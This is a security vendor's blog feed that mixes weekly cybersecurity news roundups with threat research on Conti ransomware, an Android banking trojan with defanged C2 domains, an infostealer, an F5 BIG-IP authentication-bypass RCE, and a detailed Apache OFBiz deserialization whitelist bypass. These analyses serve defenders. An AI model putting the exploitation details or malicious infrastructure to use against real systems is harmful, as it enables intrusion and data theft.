Posts

Cybersecurity News & Trends – 05-27-21

/0 Comments/in /by

This week, healthcare was under attack in the U.S. and abroad, as facilities reported outages and blackmail demands.

SonicWall in the News

Discord is now the young hacker’s weapon of choice — here’s why — tom’s guide
“Discord is the potential future of the dark net,” said Brook Chelmo, a senior strategist for SonicWall, during his recent RSA session.

Fish out the Phishing attacks — Security Middle East & Africa
“The best defense against most credential harvesting attacks is the use of a password manager,” SonicWall’s Mohamed Abdallah said. “Most are free, and none can be fooled into entering a password into a malicious site, no matter how authentic it seems.”

Industry News

As Chips Shrink, Rowhammer Attacks Get Harder to Stop — Ars Technica
A full fix for the “Half-Double” technique will require rethinking how memory semiconductors are designed.

Rise in Opportunistic Hacks and Info-Sharing Imperil Industrial Networks — Dark Reading
Security researchers have seen an increasing wave of relatively simplistic attacks involving ICS systems (and attackers sharing their finds with one another) since 2020.

Alleged North Korean hackers scouted crypto exchange employees before stealing currency — Cyberscoop
Suspected North Korean hackers have breached cryptocurrency exchanges in Japan, Europe, the U.S. and Israel in an effort to steal millions of dollars from the platforms in the last three years.

Ransomware: Two-thirds of organisations say they’ll take action to boost their defences — ZDNet
The impact of the Colonial Pipeline ransomware attack is leading companies to re-examine their cybersecurity strategies.

New Zealand Hospitals Under Prolonged IT Outage From Ransom Hack — Bloomberg
Systems are still down a week after a ransomware attack disrupted the IT network of five hospitals in the New Zealand district of Waikato, and concerns remain that private patient information may have been exposed.

Iranian hacking group targets Israel with wiper disguised as ransomware — Bleeping Computer
An Iranian hacking group has been observed camouflaging destructive attacks against Israeli targets as ransomware attacks. Meanwhile, they’re maintaining access to victims’ networks for months.

Gartner: Global Security Spending Will Reach $150 Billion in 2021 — Security Week
Gartner says nearly half (roughly $72 billion) will be spent on security services, including consulting, hardware support, and implementation and outsourced services.

Hear ye, DarkSide! This honorable ransomware court is now in session — Ars Technica
A crime forum is holding a quasi-judicial proceeding against the makers of DarkSide to hear claims from former affiliates who say the makers skipped town without paying.

FBI identifies 16 Conti ransomware attacks striking US healthcare, first responders — ZDNet
The targets identified include 911 dispatch carriers, law enforcement agencies and emergency medical services — all of which have been attacked over the past year as medical services struggled to manage the pandemic.

Vulnerability in VMware product has severity rating of 9.8 out of 10 — Ars Technica
The security flaw, which VMware disclosed and patched on Tuesday, resides in the vCenter Server, one of the most popular virtualization solutions on the market.

Cyber insurance premiums, take-up rates surge, says GAO — ZDNet
A General Accountability Office report finds that cyber insurance premiums surged in 2020 based on more frequent cyberattacks. That trend is likely to continue.

Zeppelin ransomware comes back to life with updated versions — Bleeping Computer
The developers of Zeppelin ransomware have resumed activity after a period of relative silence that started last fall.

This massive phishing campaign delivers password-stealing malware disguised as ransomware — ZDNet
Java-based STRRAT malware creates a backdoor into infected machines — but distracts victims by acting like ransomware.

Bizarro banking malware targets 70 banks in Europe and South America — Bleeping Computer
A banking trojan named Bizarro that originates from Brazil has crossed the borders and started to target customers of 70 banks in Europe and South America.

E-commerce giant suffers major data breach in Codecov incident — Bleeping Computer
E-commerce platform Mercari has disclosed a major data breach incident that occurred due to exposure from the Codecov supply-chain attack.

QNAP confirms Qlocker ransomware used HBS backdoor account — Bleeping Computer
QNAP is advising customers to update the HBS 3 disaster recovery app. The goal: to block Qlocker ransomware attacks targeting their Internet-exposed Network Attached Storage (NAS) devices.

In Case You Missed It

Infiltrate, Adapt, Repeat: A Look at Tomorrow’s Malware Landscape — Brook Chelmo
Join us for the 2021 SonicWall Partner Virtual Roadshow — David Bankemper
Capture Client 3.6 Launch Brings Key Features — Brook Chelmo
Using Client VPN with Your Firewall for WFH: a Setup for Disaster? — Jean-Pier Talbot
Triple Threat: CRN’s 2021 Women of the Channel List Honors SonicWall Leaders — Lindsey Lockhart

Conti operator demands $20M from victim. Faces litigation backlash instead

/in /by

The SonicWall Capture Labs threat research team have recently been tracking Conti ransomware. It has been reported that Conti has been connected with over 400 cyberattacks against organizations around the world. In addition to encrypting files and holding them hostage for ransom, attackers attempt to increase chances of payout by threatening to publish sensitive data that is stolen from company networks. Such double-extortion schemes are a growing trend with ransomware.

 

Infection Cycle:

 

Conti ransomware is aimed at large company networks. The initial infection is handled manually by the attackers and would usually start with phishing attempts or firewall exploits. Once inside a network, a Cobalt Strike beacon is introduced onto the system to communicate with the attacker’s C2 server. Once the backdoors are established, the attackers propogate malware further within the network and begin to exfiltrate sensitive data that will be used later on for extortion.  After this, Conti malware is deployed.

 

Conti malware uses the following icon:

 

Upon infection, files on the system are encrypted.  Each encrypted file is given a .FEEDC extension.  A file named readme.txt is dropped into directories containing encrypted files.  It contains the following message:

 

 

https://contirecovery.top is down but the tOr link leads to the following page:

 

After uploading readme.txt to the tOr website, the following conversation can be seen between a prior victim and the operator.

 

 

As seen in the message above, the operator demands a staggering $20M for file decryption.

 

After a few days, the victim fights back with litigation:

 

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Conti.RSM (Trojan)
  • GAV: Conti.RSM_2 (Trojan)
  • GAV: Conti.RSM_3 (Trojan)
  • GAV: Conti.RSM_4 (Trojan)
  • GAV: Cobaltstrike.A_1 (Trojan)
  • GAV: Cobaltstrike.A_2 (Trojan)
  • GAV: Cobaltstrike.A_3 (Trojan)
  • GAV: Cobaltstrike.A_4 (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

F5 BIG-IP iControl remote command execution vulnerability

/in /by

SonicWall Capture Labs threat research team observed attacks exploiting vulnerability in F5’s BIG-IP iControl API.

BIG-IP

F5’s BIG-IP is a product family consisting of software, hardware, and virtual appliances designed around application availability, access control, and security solutions. BIG-IP software products run on top of F5’s Traffic Management Operation System® (TMOS), designed specifically to inspect network and application traffic and make real-time decisions based on the configurations given. BIG-IP Configuration Utility is a Web GUI for F5 users to set up the BIG-IP product and to make additional changes.

Vulnerability | CVE-2021-22986
BIG-IP iControl is a REST API for BIG-IP, which is accessible over HTTPS on port 443/TCP via the following URL:

https://<host>/mgmt/tm/

BIG-IP iControl REST interface has an unauthenticated remote command execution vulnerability. This vulnerability allows for unauthenticated attackers with network access to the iControl REST interface, through the BIG-IP management interface and self IP addresses, to execute arbitrary system commands, create or delete files, and disable services. This vulnerability can only be exploited through the control pane. Exploitation can lead to complete system compromise. An unauthenticated, remote attacker could exploit this vulnerability by sending a specially crafted request to the vulnerable REST interface. Due to insufficient validation in login requests to the REST API the attacker is able to successfully bypass authentication .

After bypassing the authentication, a remote attacker can use multiple vectors to execute commands on the target
server as shown below:

The following JSON payload would execute the “id” command on the underlying operating system:

The following versions are vulnerable :

    • versions 16.0.x before 16.0.1.1
    • 15.1.x before 15.1.2.1
    • 14.1.x before 14.1.4
    • 13.1.x before 13.1.3.6
    • 12.1.x before 12.1.5.3
    • BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2

This vulnerability is patched . The vendor advisory is here 

SonicWall Capture Labs provides protection against this threat via following signatures:

    • IPS 15471:F5 BIG-IP iControl REST Remote Command Execution 1
    • IPS 15472:F5 BIG-IP iControl REST Remote Command Execution 2
    • IPS 15473:F5 BIG-IP iControl REST Remote Command Execution 3

Threat Graph

Android banker with hardcoded financial targets

/in /by

SonicWall Threats Research Team received reports of an Android banker campaign that has a multitude of features and commands at its disposal. Samples we analyzed include hardcoded financial institutions whose presence is monitored and fake login pages are shown if these targeted apps are found running on the device.

Sample Details

  • MD5:  9d050ee9d306fa2228b3ddb1840bfb61
  • Application Name: OLX
  • Package Name: man.cube.ship

Infection Cycle

Among the permissions requested, the following are a few sensitive/dangerous ones:

  • android.permission.BIND_ACCESSIBILITY_SERVICE
  • android.permission.CALL_PHONE
  • android.permission.GET_TASKS
  • android.permission.READ_SMS
  • android.permission.REAL_GET_TASKS
  • android.permission.RECEIVE_BOOT_COMPLETED
  • android.permission.RECEIVE_SMS
  • android.permission.SEND_SMS
  • android.permission.SYSTEM_ALERT_WINDOW
  • android.permission.WRITE_SETTINGS

 

Upon installation and execution, the malware does not show any screens or interface o any kind but continues to perform malicious actions in the background:

The Manifest.xml file points to a Main Activity class that gets invoked when the application runs, but this class is not see in the code base once decompiled:

This indicates that there is a possibility that a dex file containing the actual deobfuscated code is dropped when the application executes. We observe a file getting dropped in the app_DynamicOptDex folder on the device where the app gets installed. The file ZTpqTR.json is actually a DEX file that contains legible malicious code

Observations from the code

Interesting elements are present in a class file which can be considered as the configuration file. as it contains a number of hardcoded elements:

Server that the malware communicates with:

  • http://ro-37[.]in/myaccount/login[.]php

A number of domains marked as Gates:

  • http://analkarnavalbubenec[.]pw/3lfk3jGj/
  • http://karambga3j[.]net/3lfk3jGj/
  • http://lkrishtian1[.]com/3lfk3jGj/
  • http://lkrishtifaa[.]com/3lfk3jGj/

A list of financial applications that the malware targets along with what looks like fake login pages uploaded on a domain (which has been taken down as of writing this blog), complete file can be viewed here

 

The malware has capabilities to accept the following commands and execute the corresponding functionalities:

  • registration
  • send_sms
  • sms_contact
  • sms_contacts
  • get_push
  • tracker
  • move_sms_client
  • mard_mode – spelling mistake for hard mode
  • call_number
  • startes_access

 

Network activity

The malware communicated with the following domains during our analysis:

  • ro-27[.]in
  • lkrishtifaa[.]com

 

The following VirusTotal graph can be seen for this apk:

 

Banker Targets

The malware targets a number of financial institutions, notable targets include:

  • AlfaBank – Commercial bank in Russia
  • OpenBank – An online bank, headquartered in Madrid
  • Tinkoff – Russian bank based in Moscow
  • VTB24 – Leading universal bank of Russia
  • Mbank – Banking group in Poland
  • HomeCredit – An international non-bank financial institution headquartered in Netherlands

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • AndroidOS.Banker.DR_1

 

Indicators of compromise (IOC):

  • 9d050ee9d306fa2228b3ddb1840bfb61

Cybersecurity News & Trends – 05-21-21

/0 Comments/in /by

This week the DarkSide ransomware group dominated the headlines, launching additional attacks, bringing in large quantities of Bitcoin and (hopefully) being shut down for good.

SonicWall in the News

‘It’s a battle, it’s warfare’: experts seek to defeat ransomware attackers — Financial Times

  • Financial Times reporter Hannah Murphy references SonicWall data as she explores the lucrative industry of ransomware.

Breaking into New Technology with Partners — Channel Pro Network

  • MiradorIT cites its partnership with ASCII member Net Sciences for enabling it “to move into advanced cybersecurity by offering high-availability SonicWall deployments.”

Windows 10 has a built-in ransomware block, you just need to enable it — PC Gamer

  • Turns out there is a mechanism in Windows Defender that can help protect your files from ransomware. PC Gamer leverages SonicWall data to educate readers.
    *Syndicated: PC Gamer – UK

D&H Defies Pandemic: Grows U.S. Sales 19 Percent, Breaks $5B Barrier — CRN

  • D&H Distributing, the 104-year-old, employee-owned SMB distribution stalwart, helped its partners power through the global pandemic — and in the process, posted a whopping 160% increase in cloud sales for the fiscal year.

Industry News

The Full Story of the Stunning RSA Hack Can Finally Be Told — Wired

  • In 2011, Chinese spies stole the crown jewels of cybersecurity — stripping protections from firms and government agencies worldwide.

Denial of Electricity Service Could Become Next Geopolitical Weapon — The Wall Street Journal

  • With electricity expected to account for a large share of the world’s energy use by 2050, the stakes are high.

Colonial Pipeline CEO: Paying DarkSide ransom was the ‘right thing to do for the country’ — ZDNet

  • The chief executive of Colonial Pipeline has defended paying cybercriminals who launched a devastating attack on the company, calling it the “right thing to do for the country.”

School districts struggle to defend against rising ransomware attacks — The Hill

  • Cybercriminals are stepping up their efforts to hack into vulnerable school districts, often launching ransomware attacks like the kind that shut down Colonial Pipeline earlier this month.

Bizarro banking Trojan surges across Europe — ZDNet

  • Operators have targeted customers of at least 70 banks across Europe and South America so far.

Chemical distributor pays $4.4 million to DarkSide ransomware — Bleeping Computer

  • Chemical distribution company Brenntag paid a $4.4 million ransom to the DarkSide ransomware gang to receive a decryptor for encrypted files and prevent the threat actors from publicly leaking stolen data.

Legislation to secure critical systems against cyberattacks moves forward in the House — The Hill

  • Multiple bills meant to secure critical infrastructure against cyberthreats were approved by the House Homeland Security Committee — just a week after a ransomware attack on the Colonial Pipeline caused fuel shortages across the nation.

New Zealand hospitals infected by ransomware, cancel some surgeries — The Register

  • New Zealand’s Waikato District Health Board has been hit with ransomware that took down most IT services and drastically reduced services at six of its affiliate hospitals.

Hackers scan for vulnerable devices minutes after bug disclosure — Bleeping Computer

  • Every hour, a threat actor starts a new scan on the public web for vulnerable systems, moving at a quicker pace than global enterprises when trying to identify serious vulnerabilities on their networks.

Supply chain hacking attacks: Government eyes new rules to tighten security — ZDNet

  • The UK might soon require managed IT service providers to undergo extra cybersecurity checks.

‘Catastrophic’ cyberattack larger than pipeline hack increasingly likely, acting CISA chief says — The Washington Times

  • A top U.S government official said it is increasingly likely the federal government will be faced with a “catastrophic cyber incident” larger in scope than the recent Colonial Pipeline hack.

After just 9 months, Darkside ransomware gang brings in $90 million in Bitcoin — ZDNet

  • The cryptocurrency was sourced from 47 different wallets, according to research from Elliptic.

Insurer AXA hit by ransomware after dropping support for ransom payments — Bleeping Computer

  • Branches of insurance giant AXA based in Thailand, Malaysia, Hong Kong and the Philippines have been struck by a ransomware cyberattack, with 3 TB of sensitive data stolen from AXA’s Asian operations.

DarkSide ransomware servers reportedly seized, REvil restricts targets — Bleeping Computer

  • The DarkSide ransomware operation has allegedly shut down, after the threat actors lost access to servers and their cryptocurrency was transferred to an unknown wallet.

Toshiba unit struck by DarkSide ransomware group — ZDNet

  • Following Colonial Pipeline, a DarkSide affiliate has claimed another victim.

In Case You Missed It

Multistage infostealer wants your Discord, Telegram, Steam Account Info

/in /by

The SonicWall Capture Labs Threat Research team has analyzed a multi-stage infostealer. If available on the victim’s machine, this Trojan steals various cryptocurrency data, credit card info, ftp server info and credentials on Discord, Telegram, Pidgin, Steam, NordVPN and Authy (2FA) accounts. It also steals the browser history and even takes a screenshot of the desktop.

Infection Cycle:

The malware infection starts with a malicious Microsoft Excel spreadsheet file that has an embedded visual basic (VBA) macro that when executed will download a Trojan downloader.

This downloader then drops a batch file which then runs a slew of commands.

It has the functionality to add a user to the active directory.

It also  invokes powershell to run a script which downloads the main infostealer Trojan. The powershell script is encoded that when decoded shows the download URL.

To ensure persistence, it adds the infostealer Trojan to startup.

All these components files are deleted after the main infostealer has been downloaded.

Once the main infostealer is executed it creates a directory under the %Temp% folder with a random name where it logs all stolen information.

It creates a sqlite file which has the information on credit card available on the system.

It saves a png file of the screenshot of the victim’s desktop.

It also creates a file which has the list of all recently visited websites and another file which has the list of the rest of stolen information on various cryptocurrencies, popular chat app accounts like Discord, Pidgin and Telegram, VPN and FTP servers, as well as account info on popular cloud-based gaming library, like Steam.

All these log files are then deleted once they have been sent out to remote server.

During analysis we noted that this “Collector Project” (which was one of the logs’ title) indicated that this is BETA BUILD v1.11 which might suggest that this has been an ongoing project for these cybercriminals and that we can expect to see this again and other variants in the future with more features and capabilities.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Panda.B (Trojan)
  • GAV: Panda.K (Trojan)
  • GAV: Panda.STL (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

 

Cybersecurity News & Trends – 05-14-21

/0 Comments/in /by

This week attackers once again turned their attention to local government, resulting in several cities and municipal police departments reporting breaches.

SonicWall in the News

Raab set to reveal aggressive cyber-attacks targeting 80 UK schools and Universities in March — UK Tech News

  • Foreign Secretary Dominic Raab alerted the Cyber UK conference that 80 British schools and universities were hit by ransomware attacks in March, forcing them to delay reopening.
    *Syndicated: Info Security Buzz

Working from home is making companies rethink IT spending. Here’s how it’s changing — TechRepublic

  • Businesses are prioritizing their IT spending to focus on tech investments that support a ‘hybrid’ mix of working at home in the office, according to new research.

Deep Dive: Terry Greer-King, VP EMEA, SonicWall — Intelligent CISO

  • Terry Greer-King, SonicWall VP EMEA, highlights SonicWall’s Boundless Security and how it uses automated threat detection and response to help organizations protect themselves.
    *Syndicated: Intelligent CIO – EUIntelligent CIO – Africa

We regret ‘creating problems’, say Colonial petroleum pipeline hackers — Financial Times

  • The DarkSide ransomware group has stated it is apolitical and only wanted to make money, according to the Financial Times

Catch Of The Week: Ransomware Shuts Down U.S. Pipeline — Los Alomas Daily Post

  • Colonial Pipeline, one of the top U.S. fuel pipeline operators, shut down its entire network after a ransomware attack, affecting the nearly half of the East Coast’s fuel supply.

The basics of backup: How to avoid disaster — Intelligent CISO

  • As the amount of data in existence surges, business leaders must ensure they have the correct processes in place to manage it and avoid data loss.

Industry News

After Colonial Pipeline hack, lawmakers want more action on pipeline security — Cyberscoop

  • A two-year-old federal pipeline initiative has shown promise, but more needs to be done, lawmakers say.

Despite Heightened Breach Fears, Incident Response Capabilities Lag — Dark Reading

  • Many organizations remain unprepared to detect, respond to and contain a breach, a new survey shows.

Biden signs executive order to improve federal cybersecurity — The Hill

  • President Biden signed an executive order aimed at improving federal cybersecurity on the heels of multiple major and damaging cyberattacks, including the one on the Colonial Pipeline.

Global cybersecurity leaders say they feel unprepared for attack: report — The Hill

  • A majority of global CISOs surveyed said they feel their organizations are unprepared to face a cyberattack, despite many believing they will face an attack in the next year.

South Korea orders urgent review of energy infrastructure cybersecurity — The Register

  • The review was spurred by the Colonial Pipeline outage, which stressed the fuel supply of the U.S. East Coast.

FBI, CISA publish alert on DarkSide ransomware — ZDNet

  • The advisory deals with ransomware-as-a-service, thrust into the spotlight by the Colonial Pipeline cyberattack.

Ransomware crooks post cops’ psych evaluations after talks with DC police stall — Ars Technica

  • A ransomware gang that hacked the District of Columbia’s Metropolitan Police Department has posted personnel records for almost two dozen officers, including psychological assessments and polygraph tests; driver’s license images; fingerprints; social security numbers; dates of birth; and residential, financial, and marriage histories.

Experts suggest French insurer AXA’s plan to shun ransomware payouts will set a precedent — Cyberscoop

  • While some say they’re surprised it hasn’t happened sooner, others are wondering how long it will take for the rest of the industry to follow suit.

Adobe: Windows Users Hit by PDF Reader Zero-Day — Security Week

  • Adobe on Tuesday warned that a gaping security hole in Adobe Reader, one of the most widely deployed software products, has been exploited in the wild in “limited attacks.”

City of Tulsa’s online services disrupted in ransomware incident — Bleeping Computer

  • The city of Tulsa, Okla., has suffered a ransomware attack that forced the city to shut down its systems to prevent further spread.

City of Chicago Hit by Data Breach at Law Firm Jones Day — Security Week

  • The city of Chicago on Friday said that employee emails were compromised in a Jones Day data breach involving Accellion’s FTA file sharing service.

Ransomware gangs get more aggressive against law enforcement — The Washington Times

  • Criminal hackers are increasingly using brazen methods to increase pressure on law-enforcement agencies to pay ransoms, including leaking or threatening to leak highly sensitive and potentially life-threatening information.

The Colonial Pipeline Hack Is a New Extreme for Ransomware — Wired

  • Profit-focused cybercriminal hackers have inflicted a disruption that military and intelligence agency hackers have never dared to, shutting down a pipeline that carries nearly half the fuel consumed on the East Coast of the United States.

DHS to hire 200 more cyber pros as Biden administration grapples with hacking threats — Cyberscoop

  • It’s part of “the most significant hiring initiative” the department has ever undertaken, according to Alejandro Mayorkas.

In Case You Missed It

Microsoft Security Bulletin Coverage for May 2021

/in /by

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of May 2021. A list of issues reported, along with SonicWall coverage information is as follows:

CVE-2021-26419 Scripting Engine Memory Corruption Vulnerability
IPS 15554:Scripting Engine Memory Corruption Vulnerability (CVE-2021-26419)

CVE-2021-31166 HTTP Protocol Stack Remote Code Execution Vulnerability
IPS 15553:Windows HTTP Protocol Stack Remote Code Execution 3

CVE-2021-31170 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 180:Malformed-File exe.MP.180

CVE-2021-31181 Microsoft SharePoint Remote Code Execution Vulnerability
ASPY 181:Malformed-File exe.MP.181

CVE-2021-31188 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 182:Malformed-File exe.MP.182

Adobe Coverage:
CVE-2021-28550 Acrobat Reader Use After Free Vulnerability
ASPY 183:Malformed-File pdf.MP.473

CVE-2021-28560 Acrobat Reader Heap-based Buffer Overflow Vulnerability
ASPY 184:Malformed-File pdf.MP.474

The following vulnerabilities do not have exploits in the wild :

CVE-2020-24587 Windows Wireless Networking Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-24588 Windows Wireless Networking Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-26144 Windows Wireless Networking Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2021-26418 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2021-26421 Skype for Business and Lync Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2021-26422 Skype for Business and Lync Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27068 Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28455 Microsoft Jet Red Database Engine and Access Connectivity Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28461 Dynamics Finance and Operations Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2021-28465 Web Media Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28474 Microsoft SharePoint Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28476 Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28478 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2021-28479 Windows CSC Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-31165 Windows Container Manager Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-31167 Windows Container Manager Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-31168 Windows Container Manager Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-31169 Windows Container Manager Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-31171 Microsoft SharePoint Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-31172 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2021-31173 Microsoft SharePoint Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-31174 Microsoft Excel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-31175 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31176 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31177 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31178 Microsoft Office Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-31179 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31180 Microsoft Office Graphics Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31182 Microsoft Bluetooth Driver Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2021-31184 Microsoft Windows Infrared Data Association (IrDA) Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-31185 Windows Desktop Bridge Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-31186 Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-31187 Windows WalletService Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-31190 Windows Container Isolation FS Filter Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-31191 Windows Projected File System FS Filter Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-31192 Windows Media Foundation Core Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31193 Windows SSDP Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-31194 OLE Automation Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31195 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31198 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31200 Common Utilities Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31204 .NET and Visual Studio Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-31205 Windows SMB Client Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2021-31207 Microsoft Exchange Server Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2021-31208 Windows Container Manager Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-31209 Microsoft Exchange Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2021-31211 Visual Studio Code Remote Development Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31213 Visual Studio Code Remote Development Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31214 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-31936 Microsoft Accessibility Insights for Web Information Disclosure Vulnerability
There are no known exploits in the wild.

Apache OFBiz, Vulnerability

/in /by

Overview:

  Apache OFBiz is an open source enterprise resource planning (ERP) system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise. Apache OFBiz is a framework that provides a common data model and a set of business processes. Beyond the framework itself, Apache OFBiz offers the following functionality:

  • Accounting (agreements, invoicing, vendor management, general ledger)
  • Asset maintenance
  • Catalogue and product management
  • Facility and warehouse management system (WMS)
  • Manufacturing execution / manufacturing operations management (MES/MOM)
  • Order processing
  • Inventory management
  • Automated stock replenishment etc.
  • Content management system (CMS)
  • Human resources (HR)
  • People and group management
  • Project management sales force automation
  • Work effort management
  • Electronic point of sale (ePOS)
  • Electronic commerce (eCommerce) and scrum (development)

  An insecure deserialization vulnerability has been reported in Apache OFBiz. This vulnerability is due to Java serialization issues when processing requests. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request.

  Successful exploitation would result in arbitrary code execution.

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-30128

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.7 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.7 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

Technical Overview:

  An insecure deserialization vulnerability exists in Apache OFBiz. This vulnerability is due to missing input validation for malicious payloads sent in the [wpv-noautop]”cus-obj” tag[/wpv-noautop] XML element when a HTTP request is sent to the [wpv-noautop]”/webtools/control/SOAPService”[/wpv-noautop] Request-URI and also due to the existence of the secure deserialization bypass in the Java class [wpv-noautop]”org.apache.ofbiz.base.util.SafeObjectInputStream”[/wpv-noautop].

  The requests sent to this endpoint is initially handled by the Java class [wpv-noautop]”org.apache.ofbiz.webapp.control.RequestHandler”[/wpv-noautop] which determines the mapping for the URL. Next, the [wpv-noautop]invoke()[/wpv-noautop] method is called in the [wpv-noautop]”org.apache.ofbiz.webapp.event.SOAPEventHandler”[/wpv-noautop] class. This method then calls the method [wpv-noautop]deserialize()[/wpv-noautop] in the Java class [wpv-noautop]”org.apache.ofbiz.service.engine.SoapSerializer”[/wpv-noautop] which calls the method [wpv-noautop]deserialize()[/wpv-noautop] in the Java class [wpv-noautop]”org.apache.ofbiz.entity.serialize.XmlSerializer”[/wpv-noautop].

  The SOAP XML parsing is implemented in method [wpv-noautop]deserializeSingle()[/wpv-noautop] method in the Java class [wpv-noautop]”org.apache.ofbiz.entity.serialize.XmlSerializer”[/wpv-noautop]. If the tag name is [wpv-noautop]”cus-obj”[/wpv-noautop], the value of that XML element is stripped of all the space and colon [wpv-noautop]’:'[/wpv-noautop] characters in the method [wpv-noautop]fromHexString()[/wpv-noautop] also in the Java class [wpv-noautop]”org.apache.ofbiz.base.util.StringUtil”[/wpv-noautop] and the resulting byte array is passed to the method [wpv-noautop]getObject()[/wpv-noautop] in Java class [wpv-noautop]”org.apache.ofbiz.base.util.UtilObject”[/wpv-noautop]. This method then calls the method [wpv-noautop]getObjectException()[/wpv-noautop] in the Java class [wpv-noautop]org.apache.ofbiz.base.util.UtilObject[/wpv-noautop] where the insecure deserialization can occur.

  Note, that the code in the [wpv-noautop]getObjectException()[/wpv-noautop] method utilizes custom class called [wpv-noautop]”org.apache.ofbiz.base.util.SafeObjectInputStream”[/wpv-noautop] which extends Java standard library class ObjectInputStream. The Java class [wpv-noautop]”org.apache.ofbiz.base.util.SafeObjectInputStream”[/wpv-noautop] employs a whitelist of classes that are allowed to be deserialized. It allows deserialization of classes which contain the string [wpv-noautop]”java.”[/wpv-noautop].

  Also, the overloaded [wpv-noautop]resolveClass()[/wpv-noautop] method in this class calls the custom method [wpv-noautop]loadClass()[/wpv-noautop] in Java class [wpv-noautop]”org.apache.ofbiz.base.util.ObjectType”[/wpv-noautop]. The code in the method [wpv-noautop]loadClass()[/wpv-noautop] removes the name of the class to be loaded any string following and including the character ‘<'. This ensures that generic classes can be loaded. Additionally, the deserialization logic in JDK standard library class [wpv-noautop]ObjectStreamClass[/wpv-noautop] only checks the names of the classes before the deserialization by examining the name of the class after the last [wpv-noautop]'.'[/wpv-noautop] character (i.e., it does not check the entire class name before proceeding with the deserialization of the class). Therefore, an attacker can craft the serialized object with slightly altered class name that will be bypass the whitelist and JDK deserialization code that ensures the correct class is deserialized.

  A remote, unauthenticated attacker could exploit this vulnerability by sending a malicious HTTP request containing a crafted XML payload in the body of the HTTP request. Since OFBiz also uses a vulnerable versions of Apache Commons BeanUtils or ROME libraries, an attacker can craft malicious XML payload by employing the ysoserial gadget tool and by changing all the class names in the serialized object as described above.

